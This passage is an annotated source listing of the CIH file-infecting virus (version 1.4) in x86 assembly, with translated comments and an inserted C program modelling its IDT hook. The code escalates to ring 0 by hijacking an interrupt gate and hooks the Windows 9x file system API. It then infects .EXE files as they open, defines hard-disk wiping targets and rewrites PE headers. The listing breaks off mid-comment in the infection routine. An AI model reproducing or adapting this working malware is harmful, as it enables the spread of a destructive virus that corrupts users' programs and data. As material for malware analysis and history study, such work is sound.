CIH virus, annotated by Zou Dan
; Chinese annotations to CIH virus version 1.4, written by "Zou Dan" and completed on 1999-04-09
; (rendered in English below). The English comments from the original source are unmodified and kept in full.
        .586P                   ; 586 protected-mode assembly
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:                     ; header of the compiled and linked PE executable the virus is first built into
        ; IMAGE_DOS_HEADER: "MZ" ..., e_lfanew (offset 3ch) = 80h, the file offset of the PE header
        db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
        db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
        db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
        ; DOS stub: "This program cannot be run in DOS mode."
        db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
        db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
        db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
        db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
        db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
        db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
        db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
        db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        ; IMAGE_NT_HEADERS at 80h: "PE\0\0", Machine 14ch, NumberOfSections 1, SizeOfOptionalHeader 0e0h
        db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
        db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
        ; IMAGE_OPTIONAL_HEADER (PE32): AddressOfEntryPoint 1010h, ImageBase 400000h,
        ; SizeOfHeaders 200h, followed by 16 empty data directories
        db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
        db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
        db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
        db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
        db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
        db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
        db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
        db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        ; section table, one entry: ".text", VirtualSize 1000h, VirtualAddress 1000h,
        ; SizeOfRawData 1000h, PointerToRawData 200h, Characteristics 60000020h
        db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
        db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
        db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
        ; padding up to SizeOfHeaders (200h)
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        ; .text at file offset 200h: a single "ret" (0c3h), then the virus code section table
        ; (end mark 0, first chunk size VirusSize). MyVirusStart therefore sits at file offset 210h,
        ; RVA 1010h, which is the AddressOfEntryPoint above.
        db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************

; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE

MajorVirusVersion = 1           ; major version number
MinorVirusVersion = 4           ; minor version number
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ; combined version number (14h)

IF DEBUG                        ; debug build?
FirstKillHardDiskNumber = 81h   ; wipe starting at the second physical hard disk (BIOS drive 81h)
HookExceptionNumber = 05h       ; hijack interrupt vector 5
ELSE
FirstKillHardDiskNumber = 80h   ; wipe starting at the first physical hard disk (BIOS drive 80h, the "C:" disk)
HookExceptionNumber = 03h       ; hijack interrupt vector 3
ENDIF

FileNameBufferSize = 7fh

; *********************************************************
; *********************************************************
VirusGame SEGMENT
        ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
        ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
        push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
        lea eax, [esp-04h*2]
        xor ebx, ebx
        xchg eax, fs:[ebx]      ; install a new SEH frame at esp-8; eax = previous fs:[0]
        call @0
@0:
        pop ebx                 ; ebx = run-time address of @0; the code is not relocated, so every
                                ; absolute address below is formed as this base plus a relative offset
        lea ecx, StopToRunVirusCode-@0[ebx]
        push ecx                ; handler: if anything faults (e.g. on NT) run the host instead
        push eax                ; previous SEH frame

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
        push eax
        sidt [esp-02h]          ; Get IDT Base Address ; the 6-byte IDTR lands at esp-2, so its 4-byte
        pop ebx                 ; base overwrites the eax just pushed and pops straight into ebx
        add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ; ebx -> byte 4 of the chosen 8-byte gate descriptor
        cli                     ; no interrupts while the gate is being edited
        mov ebp, [ebx]          ; Get Exception Base ; dword at gate+4: attributes low, offset_high in the upper word
        mov bp, [ebx-04h]       ; Entry Point ; word at gate+0: offset_low; ebp = original handler address
        lea esi, MyExceptionHook-@1[ecx]
        push esi                ; esi = address of the virus' ring-0 handler
        mov [ebx-04h], si
        shr esi, 16             ; Modify Exception
        mov [ebx+02h], si       ; Entry Point Address ; gate now points at the virus handler; selector and DPL untouched
        pop esi

; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
        int HookExceptionNumber ; GenerateException ; enter ring 0 through the hijacked vector
ReturnAddressOfEndException = $
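The gate patch above reads and writes the 32-bit IDT gate descriptor in two 16-bit halves around the selector and attribute bytes, which is what lets a ring-3 program redirect a kernel-mode vector without rebuilding the descriptor. The following is an added example, not code from the CIH source: a byte-level model of the descriptor that reproduces the exact read (`mov ebp,[ebx]` / `mov bp,[ebx-04h]`) and write (`mov [ebx-04h],si` / `mov [ebx+02h],si`) sequences, the restore done at ExitRing0Init, and the DPL check that decides whether `int n` from ring 3 reaches the handler at all. The sample IDT and the handler address `VIRUS_HOOK` are constructed for the demonstration.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define IDT_VECTORS 256
#define VIRUS_HOOK  0x00401234u   /* hypothetical ring-3 address of MyExceptionHook in an infected host */

/* One 32-bit IDT gate descriptor (8 bytes), in the layout the sidt base address points at. */
typedef struct {
    uint16_t offset_low;    /* +0: handler address bits 0..15            */
    uint16_t selector;      /* +2: code segment the handler runs in      */
    uint8_t  reserved;      /* +4: zero for interrupt/trap gates         */
    uint8_t  type_attr;     /* +5: P(bit 7), DPL(bits 6..5), type(3..0)  */
    uint16_t offset_high;   /* +6: handler address bits 16..31           */
} idt_gate_t;

/* The virus' read sequence with ebx = IDT base + vector*8 + 4:
 *   mov ebp, [ebx]       ; dword at +4 = reserved | type_attr<<8 | offset_high<<16
 *   mov bp,  [ebx-04h]   ; word at +0 = offset_low, overwrites only the low half
 * so ebp ends up holding the complete 32-bit handler address. */
uint32_t gate_handler(const uint8_t *idt, unsigned vector)
{
    const uint8_t *ebx = idt + vector * 8 + 4;
    uint32_t ebp;
    uint16_t bp;
    memcpy(&ebp, ebx, 4);
    memcpy(&bp, ebx - 4, 2);
    return (ebp & 0xFFFF0000u) | bp;
}

/* The virus' write sequence (mov [ebx-04h],si ; shr esi,16 ; mov [ebx+02h],si): only the two
 * offset halves change; selector and type_attr stay as the OS set them, so the new handler still
 * runs at ring 0 on the kernel's code selector. Returns the old handler, which the virus keeps in
 * ebp and writes back the same way at ExitRing0Init. */
uint32_t gate_hook(uint8_t *idt, unsigned vector, uint32_t handler)
{
    uint32_t old = gate_handler(idt, vector);
    uint8_t *ebx = idt + vector * 8 + 4;
    uint16_t lo = (uint16_t)handler, hi = (uint16_t)(handler >> 16);
    memcpy(ebx - 4, &lo, 2);
    memcpy(ebx + 2, &hi, 2);
    return old;
}

/* `int n` from ring 3 reaches the handler only if the gate is present and its DPL is 3;
 * otherwise the CPU raises #GP. That constraint is why the virus hijacks vector 3 or 5
 * rather than an arbitrary one. */
int gate_usable_from_ring3(const uint8_t *idt, unsigned vector)
{
    uint8_t type_attr = idt[vector * 8 + 5];
    return (type_attr & 0x80) != 0 && ((type_attr >> 5) & 3) == 3;
}

static void put_gate(uint8_t *idt, unsigned vector, uint32_t handler, uint16_t sel, uint8_t type_attr)
{
    idt_gate_t g = { (uint16_t)handler, sel, 0, type_attr, (uint16_t)(handler >> 16) };
    memcpy(idt + vector * 8, &g, sizeof g);
}

/* Constructed sample IDT (not dumped from any system): DPL-0 interrupt gates (8Eh) on a
 * ring-0 code selector, except vectors 3 and 5, which are DPL 3 (0EEh). */
void build_sample_idt(uint8_t *idt)
{
    for (unsigned v = 0; v < IDT_VECTORS; v++)
        put_gate(idt, v, 0xC0010000u + v * 0x10, 0x0028, 0x8E);
    put_gate(idt, 3, 0xC0012345u, 0x0028, 0xEE);
    put_gate(idt, 5, 0xC0012355u, 0x0028, 0xEE);
}

static uint8_t g_idt[IDT_VECTORS * 8];

/* Scenario helpers: hijack vector 3 the way the ring-3 stage does, then restore it. */
uint32_t scenario_original_handler(void) { build_sample_idt(g_idt); return gate_handler(g_idt, 3); }
uint32_t scenario_hooked_handler(void)   { build_sample_idt(g_idt); gate_hook(g_idt, 3, VIRUS_HOOK); return gate_handler(g_idt, 3); }
uint32_t scenario_restored_handler(void)
{
    build_sample_idt(g_idt);
    uint32_t saved = gate_hook(g_idt, 3, VIRUS_HOOK);   /* the ebp the virus carries into ring 0 */
    gate_hook(g_idt, 3, saved);                         /* what ExitRing0Init writes back */
    return gate_handler(g_idt, 3);
}
uint16_t scenario_selector_after_hook(void)
{
    uint16_t sel;
    build_sample_idt(g_idt);
    gate_hook(g_idt, 3, VIRUS_HOOK);
    memcpy(&sel, g_idt + 3 * 8 + 2, 2);
    return sel;
}
int sample_vector_usable(unsigned vector) { build_sample_idt(g_idt); return gate_usable_from_ring3(g_idt, vector); }

int main(void)
{
    printf("vector 3: %08x -> hooked %08x -> restored %08x (selector %04x)\n",
           scenario_original_handler(), scenario_hooked_handler(),
           scenario_restored_handler(), scenario_selector_after_hook());
    printf("int 3 from ring 3 allowed: %d, int 20h from ring 3 allowed: %d\n",
           sample_vector_usable(3), sample_vector_usable(0x20));
    return 0;
}
```

The restore path is the same two stores with the saved value, which is why the virus can carry the original handler in a single register (ebp) through the `int` and back out through `iretd`. Note that the technique depends entirely on the IDT being writable from ring 3, which was true of Windows 9x's flat, unprotected kernel memory and is not true of NT-family kernels, where the `xchg` on `fs:[0]` above only serves to catch the resulting fault.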
; *************************************
; * Merge All Virus Code Section *
; *************************************
        push esi
        mov esi, eax            ; eax (set by the ring-0 handler) -> start of the virus body in the host image
LoopOfMergeAllVirusCodeSection:
        mov ecx, [eax-04h]      ; chunk size, from the virus code section table that sits just below the chunk
        rep movsb               ; copy this chunk into the allocated system memory (edi)
        sub eax, 08h
        mov esi, [eax]          ; address of the next chunk
        or esi, esi
        jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ; a zero address ends the table
        jmp LoopOfMergeAllVirusCodeSection ; copy the next chunk
QuitLoopOfMergeAllVirusCodeSection:
        pop esi

; *************************************
; * Generate Exception Again *
; *************************************
        int HookExceptionNumber ; GenerateException Again ; enter ring 0 a second time (with ZF = 1)

; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
        sti                     ; interrupts back on
        xor ebx, ebx
        jmp RestoreSE

; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
        xor ebx, ebx
        mov eax, fs:[ebx]
        mov esp, [eax]
RestoreSE:
        pop dword ptr fs:[ebx]
        pop eax

; *************************************
; * Return Original App to Execute *
; *************************************
        pop ebp
        push 00401000h          ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ; the immediate is patched per host with its real entry address
        ret                     ; Return to Original App Entry Point ; "return" into the host program

; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
        jz InstallMyFileSystemApiHook ; ZF = 1 only on the second entry, after the virus code has been
                                ; copied: go install the file system hook

; *************************************
; * Do My Virus Exist in System !? *
; *************************************
        mov ecx, dr0            ; dr0 doubles as the "virus already resident" marker
        jecxz AllocateSystemMemoryPage ; not set: allocate system memory
        add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; already resident: move the
                                ; return address on the stack so ring 3 resumes at ReadyRestoreSE

; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
        mov [ebx-04h], bp
        shr ebp, 16             ; Restore Exception
        mov [ebx+02h], bp       ; put the original gate entry point back
        iretd                   ; return from the interrupt

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
        mov dr0, ebx            ; Set the Mark of My Virus Exist in System
        ; prototype: ULONG _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ULONG AlignMask,
        ;            ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, ULONG flags);
        ; ecx is 0 here (jecxz above), so the pushes of ecx are zero arguments
        push 00000000fh         ; flags
        push ecx                ; PhysAddr
        push 0ffffffffh         ; maxPhys
        push ecx                ; minPhys
        push ecx                ; AlignMask
        push ecx                ; VM
        push 000000001h         ; pType
        push 000000002h         ; nPages
        int 20h                 ; VMMCALL _PageAllocate ; VxD service call
_PageAllocate = $
        dd 00010053h            ; Use EAX, ECX, EDX, and flags
        add esp, 08h*04h        ; drop the 8 dword arguments
        xchg edi, eax           ; EDI = SystemMemory Start Address
        lea eax, MyVirusStart-@2[esi] ; eax -> start of the virus body
        iretd                   ; Return to Ring3 Initial Program ; resumes at "Merge All Virus Code Section"

; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
        lea eax, FileSystemApiHook-@6[edi] ; eax -> the file system hook routine inside the system memory copy
        push eax
        int 20h                 ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
        dd 00400067h            ; Use EAX, ECX, EDX, and flags
                                ; after the first execution VMM rewrites these 6 bytes into
                                ; call [IFSMgr_InstallFileSystemApiHook]
        mov dr0, eax            ; Save OldFileSystemApiHook Address ; the service returns the previous hook in the chain
        pop eax                 ; EAX = FileSystemApiHook Address
        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
        mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
        mov edx, [ecx]          ; edx = address of the real IFSMgr_InstallFileSystemApiHook service
        mov OldInstallFileSystemApiHook-@3[eax], edx ; keep it
        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
        lea eax, InstallFileSystemApiHook-@3[eax]
        mov [ecx], eax          ; redirect the service to the virus' own InstallFileSystemApiHook
        cli
        jmp ExitRing0Init       ; leave ring 0 (back through the int 3 / int 5 return path)

; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:       ; replacement for the IFSMgr_InstallFileSystemApiHook service: whenever another
                                ; client installs a hook, the virus removes its own, lets the client's go in,
                                ; then re-installs itself, so it always stays first in the chain
        push ebx
        call @4
@4:
        pop ebx                 ; mov ebx, offset FileSystemApiHook ; ebx = address of the current instruction
        add ebx, FileSystemApiHook-@4 ; plus the delta = address of FileSystemApiHook
        push ebx
        int 20h                 ; VXDCALL IFSMgr_RemoveFileSystemApiHook ; unhook FileSystemApiHook for now
IFSMgr_RemoveFileSystemApiHook = $
        dd 00400068h            ; Use EAX, ECX, EDX, and flags ; service id
        pop eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link Client FileSystemApiHook
        push dword ptr [esp+8]
        call OldInstallFileSystemApiHook-@3[ebx] ; real service installs the caller's hook
        pop ecx
        push eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link My FileSystemApiHook
        push ebx
        call OldInstallFileSystemApiHook-@3[ebx] ; real service re-installs the virus' hook on top
        pop ecx
        mov dr0, eax            ; Adjust OldFileSystemApiHook Address ; the previous-hook pointer is now the client's hook
        pop eax
        pop ebx
        ret

; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ? ; address of the original IFSMgr_InstallFileSystemApiHook service

; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:              ; the installed file system hook
@3 = FileSystemApiHook
        pushad                  ; save all registers (20h bytes)
        call @5
@5:
        pop esi                 ; mov esi, offset ; esi = address of the current instruction
        add esi, VirusGameDataStartAddress-@5 ; plus the delta = address of VirusGameDataStartAddress

; *************************************
; * Is OnBusy !? *
; *************************************
        test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ; re-entrancy guard: set while the virus itself does file I/O
        jnz pIFSFunc            ; goto pIFSFunc ; busy: pass the request straight to the FSD

; *************************************
; * Is OpenFile !? *
; *************************************
        ; if ( NotOpenFile )
        ; goto prevhook
        lea ebx, [esp+20h+04h+04h] ; ebx -> FunctionNum (after 20h of pushad, the return address and FSDFnAddr)
        ; The hook is called with this prototype (note 2):
        ; FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
        ;                           int ResourceFlags, int CodePage, pioreq pir);
        cmp dword ptr [ebx], 00000024h ; is this a file open? (#define IFSFN_OPEN 36 in the DDK's ifs.h)
        jne prevhook            ; not an open: chain to the previous hook

; *************************************
; * Enable OnBusy *
; *************************************
        inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
        ; mov esi, offset FileNameBuffer
        add esi, FileNameBuffer-@6 ; esi -> FileNameBuffer
        push esi                ; save it
        mov al, [ebx+04h]       ; ebx+4 is the int Drive argument
        cmp al, 0ffh            ; UNC (universal naming convention) path?
        je CallUniToBCSPath     ; yes: no drive letter to prepend
        add al, 40h
        mov ah, ':'
        mov [esi], eax          ; "X:" into the buffer
        inc esi
        inc esi

; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
        ; prototype: UniToBCSPath(unsigned char *pBCSPath, ParsedPath *pUniPath,
        ;                         unsigned int maxLength, int charSet)
CallUniToBCSPath:
        push 00000000h          ; charSet
        push FileNameBufferSize ; maxLength
        mov ebx, [ebx+10h]      ; ebx = pioreq pir
        mov eax, [ebx+0ch]      ; the Unicode path pointer inside the ioreq
        add eax, 04h
        push eax                ; pUniPath
        push esi                ; pBCSPath (destination buffer)
        int 20h                 ; VXDCall UniToBCSPath
UniToBCSPath = $
        dd 00400041h            ; service id
        add esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !? *
; *************************************
        ; cmp [esi+eax-04h], '.EXE'
        cmp [esi+eax-04h], 'EXE.' ; *.EXE? (eax = returned path length; the literal is reversed because x86 is little-endian)
        pop esi
        jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
        ; cmp [esi+eax-06h], 'FUCK'
        cmp [esi+eax-06h], 'KCUF' ; debug build: only a file named "FUCK.EXE" is touched
        jne DisableOnBusy
ENDIF

; *************************************
; * Is Open Existing File !? *
; *************************************
        ; if ( NotOpenExistingFile )
        ; goto DisableOnBusy
        cmp word ptr [ebx+18h], 01h ; open action must be "open existing file"
        jne DisableOnBusy

; *************************************
; * Get Attributes of the File *
; *************************************
        mov ax, 4300h           ; IFSMgr_Ring0_FileIO function: get file attributes (R0_FILEATTRIBUTES / GET_ATTRIBUTES)
        int 20h                 ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
        dd 00400032h            ; service id
        jc DisableOnBusy        ; failed?
        push ecx                ; keep the attributes

; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
        mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
        mov edi, [edi]          ; edi = address of the IFSMgr_Ring0_FileIO service (VMM has already patched the call site)

; *************************************
; * Is Read-Only File !? *
; *************************************
        test cl, 01h
        jz OpenFile             ; not read-only

; *************************************
; * Modify Read-Only File to Write *
; *************************************
        mov ax, 4301h           ; IFSMgr_Ring0_FileIO function: set file attributes (R0_FILEATTRIBUTES / SET_ATTRIBUTES)
        xor ecx, ecx
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; clear the attributes so the file can be written

; *************************************
; * Open File *
; *************************************
OpenFile:
        xor eax, eax
        mov ah, 0d5h            ; IFSMgr_Ring0_FileIO function: open file (R0_OPENCREATFILE / R0_OPENCREAT_IN_CONTEXT)
        xor ecx, ecx            ; file attributes
        xor edx, edx
        inc edx                 ; action: open existing
        mov ebx, edx
        inc ebx                 ; mode: read/write; esi -> file name
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; this open re-enters the hook with OnBusy set
        xchg ebx, eax           ; mov ebx, FileHandle

; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
        pop ecx
        pushf
        test cl, 01h
        jz IsOpenFileOK         ; attributes were only changed if the file was read-only

; *************************************
; * Restore Attributes of the File *
; *************************************
        mov ax, 4301h           ; IFSMgr_Ring0_FileIO function: set file attributes (R0_FILEATTRIBUTES / SET_ATTRIBUTES)
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; put the original attributes back

; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
        popf
        jc DisableOnBusy        ; did the open succeed?

; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
        push esi                ; Push FileNameBuffer Address to Stack
        pushf                   ; Now CF = 0, Push Flag to Stack
        add esi, DataBuffer-@7  ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader *
; ***************************
        xor eax, eax
        mov ah, 0d6h            ; IFSMgr_Ring0_FileIO function: read file (R0_READFILE)
        ; For Doing Minimal VirusCode's Length,
        ; I Save EAX to EBP.
        mov ebp, eax
        push 00000004h          ; read 4 bytes
        pop ecx
        push 0000003ch          ; at file offset 3ch: e_lfanew, the PE header's offset in the DOS header
        pop edx
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; read into [esi]
        mov edx, [esi]          ; edx = e_lfanew

; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
        dec edx                 ; edx = e_lfanew-1
        mov eax, ebp            ; read function number
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; 4 bytes from e_lfanew-1 into [esi]: mark, 'P', 'E', 0

; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
        ; cmp [esi], '\0PE\0'
        cmp dword ptr [esi], 00455000h ; PE signature preceded by a zero byte, i.e. a PE file with no infection mark
        jne CloseFile           ; not a PE file, or already infected: close it

; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************

; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
        ; From here on every write to the file is pushed as a (buffer, file offset, size) triple;
        ; WriteVirusCodeToFile later pops and performs them in reverse order.
        push ebx                ; Save File Handle
        push 00h                ; Set VirusCodeSectionTableEndMark ; also terminates the write list

; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
        push 01h                ; Size
        push edx                ; Pointer of File ; e_lfanew-1, the byte just before the PE signature
        push edi                ; Address of Buffer ; edi is the address of IFSMgr_Ring0_FileIO, so whatever
                                ; byte sits there becomes the mark (the annotator notes the original comment
                                ; does not say what the buffer holds)

; ***************************
; * Save ESP Register *
; ***************************
        mov dr1, esp

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
        push eax                ; Size (4)

; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
        mov eax, ebp
        mov cl, SizeOfImageHeaderToRead ; byte count (defined in the data area); it covers the rest of the file
                                ; header and the optional header, not just the NumberOfSections word
        add edx, 07h            ; Move EDX to NumberOfSections ; e_lfanew-1+7 = e_lfanew+6
        call edi                ; VXDCall IFSMgr_Ring0_FileIO ; read into [esi]; the data-area labels mirror the header
                                ; layout (@8 = NumberOfSections), so X-@8 is the distance from NumberOfSections to field X

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
        lea eax, (AddressOfEntryPoint-@8)[edx]
        push eax                ; Pointer of File ; file offset of AddressOfEntryPoint
        lea eax, (NewAddressOfEntryPoint-@8)[esi]
        push eax                ; Address of Buffer

; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
        movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
        lea edx, [eax+edx+12h]  ; section table = NumberOfSections offset + 12h + SizeOfOptionalHeader

; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
        mov al, SizeOfScetionTable ; size of one section table entry (bytes)
        ; I Assume NumberOfSections <= 0ffh
        mov cl, (NumberOfSections-@8)[esi]
        mul cl                  ; entry size * entry count = section table size

; ***************************
; * Let's Set Section Table *
; ***************************
        ; Move ESI to the Start of SectionTable
        lea esi, (StartOfSectionTable-@8)[esi] ; esi -> the section table image in the virus' data area (@9)
        push eax                ; Size ; section table size
        push edx                ; Pointer of File ; file offset of the section table
        push esi                ; Address of Buffer

; ***************************
; * The Code Size of Merge *
